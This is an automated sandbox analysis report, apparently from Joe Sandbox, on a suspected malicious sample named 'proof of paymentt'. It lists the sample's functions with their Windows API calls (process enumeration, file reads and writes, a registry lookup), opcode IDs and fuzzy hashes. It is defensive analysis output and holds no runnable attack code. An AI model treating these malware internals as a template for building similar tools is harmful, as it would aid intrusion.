Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59

Uniqueness

Uniqueness Score: -1.00%

Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54

Uniqueness

Uniqueness Score: -1.00%

Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B63A

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D

Uniqueness

Uniqueness Score: -1.00%

Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524

Uniqueness

Uniqueness Score: -1.00%

Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040AA0B

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B052

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28

Uniqueness

Uniqueness Score: -1.00%

Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A

Uniqueness

Uniqueness Score: -1.00%

Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?), ref: 0044DEB6

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04

Uniqueness

Uniqueness Score: -1.00%

Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17

Uniqueness

Uniqueness Score: -1.00%

Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0041530C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA

Uniqueness

Uniqueness Score: -1.00%

Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004095FC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
String ID:
API String ID: 3655998216-0
Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659

Uniqueness

Uniqueness Score: -1.00%

Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00445426

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
String ID:
API String ID: 1828521557-0
Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00406BC1

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68

Uniqueness

Uniqueness Score: -1.00%

Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID:
API String ID: 2136311172-0
Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052

??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0041402F
GetDlgItem.USER32(?,000003E8), ref: 0041403B
GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
GetWindowLongW.USER32(?,000000F0), ref: 00414056
GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
GetWindowLongW.USER32(?,000000EC), ref: 0041406B
GetWindowRect.USER32(00000000,?), ref: 0041407D
GetWindowRect.USER32(?,?), ref: 00414088
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
GetDC.USER32 ref: 004140E3
wcslen.MSVCRT ref: 00414123
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
ReleaseDC.USER32(?,?), ref: 00414181
_snwprintf.MSVCRT ref: 00414244
SetWindowTextW.USER32(?,?), ref: 00414258
SetWindowTextW.USER32(?,00000000), ref: 00414276
GetDlgItem.USER32(?,00000001), ref: 004142AC
GetWindowRect.USER32(00000000,?), ref: 004142BC
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
GetClientRect.USER32(?,?), ref: 004142E1
GetWindowRect.USER32(?,?), ref: 004142EB
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
GetClientRect.USER32(?,?), ref: 0041433B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373

Strings

STATIC, xrefs: 004141E3
%s:, xrefs: 00414239
EDIT, xrefs: 00414219

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16

Uniqueness

Uniqueness Score: -1.00%

Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4

Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A

GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4

Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024

memcpy.MSVCRT ref: 0040C11B
strchr.MSVCRT ref: 0040C140
strchr.MSVCRT ref: 0040C151
_strlwr.MSVCRT ref: 0040C15F
memset.MSVCRT ref: 0040C17A
CloseHandle.KERNEL32(00000000), ref: 0040C1C7

Strings

4, xrefs: 0040C0C8
h, xrefs: 0040C12C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
